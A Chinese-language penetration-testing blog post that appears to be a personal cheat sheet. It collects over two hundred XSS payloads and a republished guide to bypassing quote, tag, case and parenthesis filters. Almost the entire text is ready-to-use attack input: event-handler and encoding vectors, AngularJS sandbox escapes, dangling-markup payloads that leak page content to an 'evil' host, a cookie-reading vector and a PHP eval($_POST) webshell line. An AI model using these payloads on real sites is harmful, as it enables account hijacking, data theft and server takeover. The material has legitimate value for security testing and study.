渗透测试 速查表

xss盲打payload及其绕过

Posted by 0nlyuAar0n on 2021-08-10
Estimated Reading Time 36 Minutes
Words 6.3k In Total
Viewed Times

XSS

payload速查

特殊字符测试(通过回显看系统如何处理,是否报错):
=!@#$%^&*()_+|}{[]

1
2
3
4
5
6
十进制值                           URL编码                            介绍            
       47                                %2F                                正斜杠            
       13                                %0D                                回车            
       12                                %0C                                分页符            
       10                                %0A                                换行            
         9                                %09                                水平制表符

常规:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
# 过滤尖括号
onclick="prompt(document.cookie)
-----------------------------------------------
# 必须要求被改变的位置是php文件,

# 必须要php下确实存在的才可以被利用,这个方法可用完全是因为php支持html的原因,也算是多一个方法了,php7移除了该方法
   <script language="php">eval($_POST[c])</script>
"><script language=php>phpinfo();</script>
 # https://blog.csdn.net/qq_18501087/article/details/89811397
--------------------------------------------
    
><script>alert(document.cookie)</script>


 </textarea><script>alert("xss")</script>
    


<img src="pic.gif" οnerrοr="javascript:this.src='/noPic.gif';" alt="pic" />



# 注意前端是否闭合“>

"><img src="pdpdp.gif"></img>   //
 
“><img src="https://timgsa.baidu.com/timg?image&quality=80&size=b9999_10000&sec=1563853097733&di=9b803160596e63aaf5761db810cee45e&imgtype=0&src=http%3A%2F%2Fimg0.pconline.com.cn%2Fpconline%2F1605%2F30%2F7957982_25_thumb.jpg"></img>   //
--------------------------------------------
# svg
<svg></p><style><a id="</style><img src=1 onerror=alert(1)>
<svg><p><style><a id="</style><img src=1 onerror=alert(1)>"></p></svg>
<svg/οnlοad=alert(1)>
<svg

onload=alert(1)><svg> # newline char

<svg    onload=alert(1)><svg> # tab char

<svg οnlοad=alert(1)>   # new page char (0xc)
    
--------------------------------------------
">< a href="javascript:alert(/test/)">xss</ a>
链接注入:
"><a href=javascript:a='al';b='ert';c='(/xss/)';eval(a+b+c)>x&page=1

<iframe src=javascript:alert('xss');height=0 width=0 /><iframe>利用iframe框架标签

"><iframe src=javascript:alert('xss');height=0 width=0 /><iframe><

"><iframe src=javascript:alert('xss');></iframe><

alert被过滤
<img src="1" \x61\x6c\x65\x72\x74\x28\x27\x78\x73\x73\x27\x29")></img>

"><img src="1" \x61\x6c\x65\x72\x74\x28\x27\x78\x73\x73\x27\x29")></img>"<

<input type="text" class="form-control" name="category.categoryName" value="                  ">

<input type="text" class="form-control" name="name" value=" "><img src="1" \x61\x6c\x65\x72\x74\x28\x27\x78\x73\x73\x27\x29")></img><“ ">


<input type="text" class="form-control" id="resName" placeholder="请输入项目名称      "><a href=javascript:a='al';b='ert';c='(/xss/)';eval(a+b+c)>x&page=1
<“   ">

事件备注:

1
2
3
4
5
6
7
8
9
事件名称 标签 备注
onplay video, audio 适用于0-click:结合HTML的autoplay属性以及结合有效的视频/音频
onplaying video, audio 适用于0-click: 结合HTML的autoplay属性以及结合有效的视频/音频
oncanplay video, audio 必须链接有效的视频/音频
onloadeddata video, audio 必须链接有效的视频/音频
onloadedmetadata video, audio 必须链接有效的视频/音频
onprogress video, audio 必须链接有效的视频/音频
onloadstart video, audio 潜在的0-click向量
oncanplay video, audio 必须链接有效的视频/音频

事件

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
<video autoplay controls onplay="alert()"><source src="http://mirrors.standaloneinstaller.com/video-sample/lion-sample.mp4"></video>

<video controls onloadeddata="alert()"><source src="http://mirrors.standaloneinstaller.com/video-sample/lion-sample.mp4"></video>

<video controls onloadedmetadata="alert()"><source src="http://mirrors.standaloneinstaller.com/video-sample/lion-sample.mp4"></video>

<video controls onloadstart="alert()"><source src="http://mirrors.standaloneinstaller.com/video-sample/lion-sample.mp4"></video>

<video controls onloadstart="alert()"><source src=x></video>

<video controls oncanplay="alert()"><source src="http://mirrors.standaloneinstaller.com/video-sample/lion-sample.mp4"></video>

<audio autoplay controls onplay="alert()"><source src="http://mirrors.standaloneinstaller.com/video-sample/lion-sample.mp4"></audio>

<audio autoplay controls onplaying="alert()"><source src="http://mirrors.standaloneinstaller.com/video-sample/lion-sample.mp4"></audio>
1
2
3
4
5
6
7
8
9
10
11
12
13
<object data="data:text/html,<script>alert(5)</script>">

<iframe srcdoc="<svg onload=alert(4);>">

<object data=javascript:alert(3)>

<iframe src=javascript:alert(2)>

<embed src=javascript:alert(1)>

<embed src="data:text/html;base64,PHNjcmlwdD5hbGVydCgiWFNTIik7PC9zY3JpcHQ+" type="image/svg+xml" AllowScriptAccess="always"></embed>

<embed src="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczL**yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg=="></embed>

关于DOM

1
2
3
4
5
6
字符                                使用                                多段代码            
      141                                DOM和非DOM                                javascript:”/*’/*`/*–></noscript></title></textarea></style></template></noembed></script><html \” onmouseover=/*<svg/*/onload=alert()//>            
      88                                非DOM                                “‘–></noscript></noembed></template></title></textarea></style><script>alert()</script>            
      95                                DOM                                ‘”–></title></textarea></style></noscript></noembed></template></frameset><svg onload=alert()>            
      54                                非DOM                                “‘>–>*/</noscript></ti tle><script>alert()</script>            
      42                                DOM                                “‘–></style></script><svg onload=alert()>

payload 210发:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
<a id=x tabindex=1 onactivate=alert(1)></a>
<body onafterprint=alert(2)>
<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><a id=x style="position:absolute;" onanimationcancel="alert(3)"></a>
<style>@keyframes x{}</style><a style="animation-name:x" onanimationend="alert(4)"></a>
<style>@keyframes slidein {}</style><a style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(5)"></a>
<style>@keyframes x{}</style><a style="animation-name:x" onanimationstart="alert(6)"></a>
<a id=x tabindex=1 onbeforeactivate=alert(7)></a>
<a id=x tabindex=1 onbeforedeactivate=alert(8)></a><input autofocus>
<body onbeforeprint=alert(9)>
<body onbeforeunload="location='javascript:alert(10)'">
<svg><animate onbegin=alert(11) attributeName=x dur=1s>
<a onblur=alert(12) tabindex=1 id=x></a><input autofocus>
<marquee width=1 loop=1 onbounce=alert(13)>XSS</marquee>
<audio oncanplay=alert(14)><source src="validaudio.wav" type="audio/wav"></audio>
<video oncanplaythrough=alert(15)><source src="validvideo.mp4" type="video/mp4"></video>
<a id=x tabindex=1 ondeactivate=alert(16)></a><input id=y autofocus>
<svg><animate onend=alert(17) attributeName=x dur=1s>
<audio controls autoplay onended=alert(18)><source src="validaudio.wav" type="audio/wav"></audio>
<audio src/onerror=alert(19)>
<marquee width=1 loop=1 onfinish=alert(20)>XSS</marquee>
<a id=x tabindex=1 onfocus=alert(21)></a>
<a id=x tabindex=1 onfocusin=alert(22)></a>
<a onfocusout=alert(23) tabindex=1 id=x></a><input autofocus>
<body onhashchange="alert(24)">
<svg><a onload=alert(25)></a>
<audio onloadeddata=alert(26)><source src="validaudio.wav" type="audio/wav"></audio>
<audio autoplay onloadedmetadata=alert(27)> <source src="validaudio.wav" type="audio/wav"></audio>
<image src=validimage.png onloadend=alert(28)>
<image src=validimage.png onloadstart=alert(29)>
<body onmessage=alert(30)>
<body onpageshow=alert(31)>
<audio autoplay onplay=alert(32)><source src="validaudio.wav" type="audio/wav"></audio>
<audio autoplay onplaying=alert(33)><source src="validaudio.wav" type="audio/wav"></audio>
<body onpopstate=alert(34)>
<applet onreadystatechange=alert(35)></applet>
<svg><animate onrepeat=alert(36) attributeName=x dur=1s repeatCount=2 />
<body onresize="alert(37)">
<body onscroll=alert(38)><div style=height:1000px></div><div id=x></div>
<marquee onstart=alert(39)>XSS</marquee>
<audio controls autoplay ontimeupdate=alert(40)><source src="validaudio.wav" type="audio/wav"></audio>
<details ontoggle=alert(41) open>test</details>
<style>:target {color: red;}</style><a id=x style="transition:color 10s" ontransitioncancel=alert(42)></a>
<style>:target {color:red;}</style><a id=x style="transition:color 1s" ontransitionend=alert(43)></a>
<style>:target {transform: rotate(180deg);}</style><a id=x style="transition:transform 2s" ontransitionrun=alert(44)></a>
<body onunhandledrejection=alert(45)><script>fetch('//xyz')</script>
<video autoplay controls onwaiting=alert(46)><source src="validvideo.mp4" type=video/mp4></video>
<input onauxclick=alert(47)>
<a onbeforecopy="alert(48)" contenteditable>test</a>
<a onbeforecut="alert(49)" contenteditable>test</a>
<a onbeforepaste="alert(50)" contenteditable>test</a>
<input onchange=alert(51) value=xss>
<a onclick="alert(52)">test</a>
<a oncontextmenu="alert(53)">test</a>
<a oncopy="alert(54)" contenteditable>test</a>
<a oncut="alert(55)" contenteditable>test</a>
<a ondblclick="alert(56)">test</a>
<a draggable="true" ondrag="alert(57)">test</a>
<a draggable="true" ondragend="alert(58)">test</a>
<a draggable="true" ondragenter="alert(59)">test</a>
<a draggable="true" ondragleave="alert(60)">test</a>
<div draggable="true" contenteditable>drag me</div><a ondragover=alert(61) contenteditable>drop here</a>
<a draggable="true" ondragstart="alert(62)">test</a>
<div draggable="true" contenteditable>drag me</div><a ondrop=alert(63) contenteditable>drop here</a>
<input oninput=alert(64) value=xss>
<form><input oninvalid=alert(65) required><input type=submit>
<a onkeydown="alert(66)" contenteditable>test</a>
<a onkeypress="alert(67)" contenteditable>test</a>
<a onkeyup="alert(68)" contenteditable>test</a>
<a onmousedown="alert(69)">test</a>
<a onmouseenter="alert(70)">test</a>
<a onmouseleave="alert(71)">test</a>
<a onmousemove="alert(72)">test</a>
<a onmouseout="alert(73)">test</a>
<a onmouseover="alert(74)">test</a>
<a onmouseup="alert(75)">test</a>
<a onpaste="alert(76)" contenteditable>test</a>
<audio autoplay controls onpause=alert(77)><source src="validaudio.wav" type="audio/wav"></audio>
<form onreset=alert(78)><input type=reset>
<form><input type=search onsearch=alert(79) value="Hit return" autofocus>
<audio autoplay controls onseeked=alert(80)><source src="validaudio.wav" type="audio/wav"></audio>
<audio autoplay controls onseeking=alert(81)><source src="validaudio.wav" type="audio/wav"></audio>
<input onselect=alert(82) value="XSS" autofocus>
<form onsubmit=alert(83)><input type=submit>
<svg onunload=window.open('javascript:alert(84)')>
<audio autoplay controls onvolumechange=alert(85)><source src="validaudio.wav" type="audio/wav"></audio>
<body onwheel=alert(86)>
<script>onerror=alert;throw 1</script>
<script>{onerror=alert}throw 1</script>
<script>throw onerror=alert,1</script>
<script>throw onerror=eval,'=alert\x281\x29'</script>
<script>{onerror=eval}throw{lineNumber:1,columnNumber:1,fileName:1,message:'alert\x281\x29'}</script>
<script>'alert\x281\x29'instanceof{[Symbol.hasInstance]:eval}</script>
<script>'alert\x281\x29'instanceof{[Symbol['hasInstance']]:eval}</script>
<script>location='javascript:alert\x281\x29'</script>
<script>location=name</script>
<script>alert`1`</script>
<xss class=progress-bar-animated onanimationstart=alert(97)>
<xss class="carousel slide" data-ride=carousel data-interval=100 ontransitionend=alert(98)><xss class=carousel-inner><xss class="carousel-item active"></xss><xss class=carousel-item></xss></xss></xss>
<iframe src="javascript:alert(99)">
<object data="javascript:alert(100)">
<embed src="javascript:alert(101)">
<a href="javascript:alert(102)">XSS</a>
<a href="JaVaScript:alert(103)">XSS</a>
<a href=" 	javascript:alert(104)">XSS</a>
<a href="javas	cript:alert(105)">XSS</a>
<svg><a xlink:href="javascript:alert(106)"><text x="20" y="20">XSS</text></a>
<svg><animate xlink:href=#xss attributeName=href values=javascript:alert(107) /><a id=xss><text x=20 y=20>XSS</text></a>
<svg><animate xlink:href=#xss attributeName=href from=javascript:alert(108) to=1 /><a id=xss><text x=20 y=20>XSS</text></a>
<svg><set xlink:href=#xss attributeName=href from=? to=javascript:alert(109) /><a id=xss><text x=20 y=20>XSS</text></a>
<script src="data:text/javascript,alert(110)"></script>
<svg><script href="data:text/javascript,alert(111)" />
<svg><use href="data:image/svg+xml,<svg id='x' xmlns='http://www.w3.org/2000/svg' xmlns:xlink='http://www.w3.org/1999/xlink' width='100' height='100'><a xlink:href='javascript:alert(112)'><rect x='0' y='0' width='100' height='100' /></a></svg>#x"></use></svg>
<script>import('data:text/javascript,alert(113)')</script>
<base href="javascript:/a/-alert(114)///////"><a href=../lol/safari.html>test</a>
<math><x href="javascript:alert(115)">blah
<form><button formaction=javascript:alert(116)>XSS
<form><input type=submit formaction=javascript:alert(117) value=XSS>
<form action=javascript:alert(118)><input type=submit value=XSS>
<isindex type=submit formaction=javascript:alert(119)>
<isindex type=submit action=javascript:alert(120)>
<svg><use href="//subdomain1.portswigger-labs.net/use_element/upload.php#x" /></svg>
<iframe srcdoc="<img src=1 onerror=alert(122)>"></iframe>
<iframe srcdoc="&lt;img src=1 onerror=alert(123)&gt;"></iframe>
<form action="javascript:alert(124)"><input type=submit id=x></form><label for=x>XSS</label>
<input type="hidden" accesskey="X" onclick="alert(125)"> (Press ALT+SHIFT+X on Windows) (CTRL+ALT+X on OS X)
<link rel="canonical" accesskey="X" onclick="alert(126)" /> (Press ALT+SHIFT+X on Windows) (CTRL+ALT+X on OS X)
<a href=# download="filename.html">Test</a>
<img referrerpolicy="no-referrer" src="//portswigger-labs.net">
<meta http-equiv="refresh" content="0; url=//portswigger-labs.net">
<meta charset="UTF-7" /> +ADw-script+AD4-alert(130)+ADw-/script+AD4-
<meta http-equiv="Content-Type" content="text/html; charset=UTF-7" /> +ADw-script+AD4-alert(131)+ADw-/script+AD4-
<meta http-equiv="Content-Security-Policy" content="upgrade-insecure-requests">
<iframe sandbox src="//portswigger-labs.net"></iframe>
<meta name="referrer" content="no-referrer">
<script>\u0061lert(1)</script>
<script>\u{61}lert(1)</script>
<script>\u{0000000061}lert(1)</script>
<script>eval('\x61lert(1)')</script>
<a href="&#106;avascript:alert(139)">XSS</a><a href="&#106avascript:alert(139)">XSS</a>
<a href="&#0000106avascript:alert(140)">XSS</a>
<a href="&#x6a;avascript:alert(141)">XSS</a>
<a href="&#x0000006a;avascript:alert(142)">XSS</a>
<a href="&#X6A;avascript:alert(143)">XSS</a>
<a href="javascript:x='%27-alert(144)-%27';">XSS</a>
<a href="javascript:x='&percnt;27-alert(145)-%27';">XSS</a>
<a href="javascript&#x6a;avascript:alert(146)">Firefox</a>
<a href="javascript&colon;alert(147)">Firefox</a>
<script src=data:text/javascript;base64,YWxlcnQoMSk=></script>
{{constructor.constructor('alert(149)')()}}
{{$on.constructor('alert(150)')()}}
{{a='constructor';b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,'alert(151)')()}}
{{{}.")));alert(152)//"}}
{{(_=''.sub).call.call({}[$='constructor'].getOwnPropertyDescriptor(_.__proto__,$).value,0,'alert(153)')()}}
{{toString.constructor.prototype.toString=toString.constructor.prototype.call;["a","alert(154)"].sort(toString.constructor);}}
{{{}.")));alert(155)//"}}
{{{}.")));alert(156)//"}}
{{{}[{toString:[].join,length:1,0:'__proto__'}].assign=[].join;'a'.constructor.prototype.charAt=[].join;$eval('x=alert(157)//');}}
{{'a'[{toString:false,valueOf:[].join,length:1,0:'__proto__'}].charAt=[].join;$eval('x=alert(158)//');}}
{{'a'.constructor.prototype.charAt=[].join;$eval('x=alert(159)');}}
{{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(160)//');}}
{{x={'y':''.constructor.prototype};x['y'].charAt=[].join;$eval('x=alert(161)');}}
{{constructor.constructor('alert(162)')()}}
{{$on.constructor('alert(163)')()}}
constructor.constructor('alert(164)')()
a='constructor';b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,'alert(165)')()
toString.constructor.prototype.toString=toString.constructor.prototype.call;["a","alert(166)"].sort(toString.constructor)
{}[['__proto__']]['x']=constructor.getOwnPropertyDescriptor;g={}[['__proto__']]['x'];{}[['__proto__']]['y']=g(''.sub[['__proto__']],'constructor');{}[['__proto__']]['z']=constructor.defineProperty;d={}[['__proto__']]['z'];d(''.sub[['__proto__']],'constructor',{value:false});{}[['__proto__']]['y'].value('alert(167)')()
{}.")));alert(168)//";
'a'.constructor.prototype.charAt=[].join;[1]|orderBy:'x=1} } };alert(169)//';
constructor.constructor('alert(170)')()
toString().constructor.prototype.charAt=[].join; [1,2]|orderBy:toString().constructor.fromCharCode(120,61,97,108,101,114,116,40,49,41)
<input autofocus ng-focus="$event.path|orderBy:'[].constructor.from([1],alert)'">
<input id=x ng-focus=$event.path|orderBy:'(z=alert)(1)'>
<input autofocus ng-focus="$event.composedPath()|orderBy:'[].constructor.from([1],alert)'">
<div ng-app ng-csp><div ng-focus="x=$event;" id=f tabindex=0>foo</div><div ng-repeat="(key, value) in x.view"><div ng-if="key == 'window'">{{ [1].reduce(value.alert, 1); }}</div></div></div>
<link rel=stylesheet href="//evil?
<link rel=icon href="//evil?
<meta http-equiv="refresh" content="0; http://evil?
<video><track default src="//evil?
<video><source src="//evil?
<audio><source src="//evil?
<input type=image src="//evil?
<form><button style="width:100%;height:100%" type=submit formaction="//evil?
<form><input type=submit value="XSS" style="width:100%;height:100%" type=submit formaction="//evil?
<button form=x style="width:100%;height:100%;"><form id=x action="//evil?
<isindex type=image src="//evil?
<isindex type=submit style=width:100%;height:100%; value=XSS formaction="//evil?
<object data="//evil?
<iframe src="//evil?
<embed src="//evil?
<form><button formaction=//evil>XSS</button><textarea name=x>
<button form=x>XSS</button><form id=x action=//evil target='
<a href=http://subdomain1.portswigger-labs.net/dangling_markup/name.html><font size=100 color=red>You must click me</font></a><base target="
<form><input type=submit value="Click me" formaction=http://subdomain1.portswigger-labs.net/dangling_markup/name.html formtarget="
<a href=abc style="width:100%;height:100%;position:absolute;font-size:1000px;">xss<base href="//evil/
<embed src=http://subdomain1.portswigger-labs.net/dangling_markup/name.html name="
<iframe src=http://subdomain1.portswigger-labs.net/dangling_markup/name.html name="
<object data=http://subdomain1.portswigger-labs.net/dangling_markup/name.html name="
<frameset><frame src=http://subdomain1.portswigger-labs.net/dangling_markup/name.html name="
javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(200)//'>
<img src="javascript:alert(201)">
<body background="javascript:alert(202)">
<iframe src="data:text/html,<img src=1 onerror=alert(203)>">
<a title="&{alert(204)}">XSS</a>
<link href="xss.js" rel=stylesheet type="text/javascript">
<form><button name=x formaction=x><b>stealme
<form action=x><button>XSS</button><select name=x><option><plaintext><script>token="supersecret"</script>
<img src="blah" style="-moz-binding: url(data:text/xml;charset=utf-8,%3C%3Fxml%20version%3D%221.0%22%3F%3E%3Cbindings%20xmlns%3D%22 http%3A//www.mozilla.org/xbl%22%3E%3Cbinding%20id%3D%22loader%22%3E%3Cimplementation%3E%3Cconstructor%3E%3C%21%5BCDATA%5Bvar%20url%20%3D%20%22alert.js %22%3B%20var%20scr%20%3D%20document.createElement%28%22script%22%29%3B%20scr.setAttribute%28%22src%22%2Curl%29%3B%20var%20bodyElement%20%3D%20 document.getElementsByTagName%28%22html%22%29.item%280%29%3B%20bodyElement.appendChild%28scr%29%3B%20%5D%5D%3E%3C/constructor%3E%3C/implementation%3E%3C/ binding%3E%3C/bindings%3E)" />
<a style="behavior:url(#default#AnchorClick);" folder="javascript:alert(209)">XSS</a>
<HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS<img src=1 onerror=alert(210)>"> </BODY></HTML>

XSS绕过技巧

来自:白泽Sec安全实验室

前言

XSS是Web应用程序中常见的漏洞之一,网站管理员可以通过用户输入过滤、根据上下文转换输出数据、正确使用DOM、强制执行跨源资源共享(CORS)策略以及其他的安全策略来规避XSS漏洞。尽管现在有很多预防XSS攻击的技术,但Web应用程序防火墙(WAF)或自定义数据过滤器是目前使用比较广泛的安全保护技术了,很多厂商都会利用这些技术来抵御新型的XSS攻击向量

有些时候,通用的绕过技巧并不可行,这个时候我们就得观察缺陷点的周围环境,想想其它办法咯。“猥琐绕过”与通用绕过不 同的是,它通用性小,往往只是特例。

1.单引号过滤绕过

在我们的单引号之前放置了一个“\”,有时候双引号之前也会放置,通 过一些类似 add_slashes 的函数可以实现,这个就是转义字符,我们先前的代码就会变成这样:

1
<INPUT type="text" value='\'><SCRIPT>alert(\"XSS\")</SCRIPT>'>

有一些方法可以继续,但是要看过滤的那个函数是怎么放的了。其中一个方法就是使用字符实体,学过 html 的都知道,就是一些特殊字符会用一些固有的符号组合来表示,举个例子,你不能用<>表示大于和小于, 因为这被解释为 html 标签,但是,你如果要用,可以用下面的来代替。

1
2
3
4
5
1    2    3    4
&#34;    &quot;    “    双引号    
&#38;    &amp;    &    &符号    
&#60;    &lt;    <    小于号    
&#62;    &gt;    >    大于号

使用&quot;或者&#34; 来代替我们的双引号,有时候可以绕过过滤

例子:

1
2
3
<script>alert("XSS")</script>
<script>alert(&quot;XSS&quot;)</script>
<script>alert(&#38;XSS&#38;)</script>

如果这都被过滤了。那我们可以使用 JavaScript 的 fromCharCode 函数,这个函数把指定的 Unicode值转换成字符串

例子

1
2
<script>alert("XSS")</script>
<script>alert(String.fromCharCode(88,83,83))</script>

2.<SCRIPT>过滤绕过

有些过滤器会过滤到<script>标签,那上面的例子就都废了,但是。还是有方法插入 javascript 的。我们看看事件处理器的例子。

1
<BODY onload="alert('XSS')">

在 html 里啊。这个 Onload 关键字就是一个事件,其他的所有标签都没有这个属性,但是 Body 标签是有的。但是,有一定的局限性,如果 onload 事件在你的代码之前已经被处理了。那就不会触发了。。不过我们可以继续看看 onerror 事件处理。

1
2
<IMG SRC="" onerror="alert('XSS')">
<IMG SRC=/ onerror="alert(String.fromCharCode(88,83,83))"></img>

注意看,图片没有指定,也就是出错了。Onerror 这个事件就会发茶。引发 XSS 漏洞,没有用<script> 标签哦。

如果是把<script></script>标签过滤掉,那么可以用

1
<scr<script>ipt>alert(1)</scr<script>ipt>

3.(Input)标签属性绕过

1
<INPUT type="text" value='<SCRIPT>alert("XSS")</SCRIPT>'>

闭合<input>

1
'><SCRIPT>alert("XSS")</SCRIPT>

现在我们的代码执行了。因为我们闭合了前面的 html 标签,就触发了 XSS,但是,你可能会发现,页面上会显示一个多出来的单引号,为什么,因为后面的那个原来的单引号没有匹配,我们继续修改我们的代码。

1
'><SCRIPT>alert("XSS")</SCRIPT><xss a='

所有的输入就会变成这样:

1
<INPUT type="text" value=''><SCRIPT>alert("XSS")</SCRIPT><xss a=''>

Javascript 代码就注入了。<xss a=”>这个没什么意义,你可以自己改,但是符合 html 的标准, 页面不会出错。

4.大小写混用绕过

1
<iMgSRC = "JavaScript:alert(0);">

不使用引号或者构造全角字符也能扰乱过滤规则

还有像CSS中/**/会被浏览器忽略,\和\0同样或被浏览器忽略,同样可以用来绕过:

1
<img src ="java/*javascript:alert(‘xss‘)*/script:alert(1);">

5.magic_quotes_gpc绕过

1
<script>String.fromCharCode(97, 108, 101, 114, 116, 40, 34, 88, 83, 83, 34, 41, 59)</script>

6.分号引号过滤绕过

1
<IMG SRC=javascript:alert('XSS')>

7.括号被过滤绕过

当括号被过滤的时候可以使用throw来绕过

1
2
<a onmouseover="javascript:window.onerror=alert;throw 1>
<img src=x onerror="javascript:window.onerror=alert;throw 1">

以上两个测试向量在Chrome跟IE在上面会出现一个“uncaught”的错误,可以用以下的向量:

1
<body/onload=javascript:window.onerror=eval;throw'=alert\x281\x29';>

8.= ( ) ; :被过滤时绕过

1
<svg><script>alert&#40/1/&#41</script> // 通杀所有浏览器

opera中可以不闭合

1
<svg><script>alert&#40 1&#41 // Opera可查

参考资料

-------------------------------------------------------------------------------- If you like this blog or find it useful for you, you are welcome to comment on it. You are also welcome to share this blog, so that more people can participate in it. If the images used in the blog infringe your copyright, please contact the author to delete them. Thank you !

FEATURED TAGS
渗透测试 速查表
FRIENDS
ESC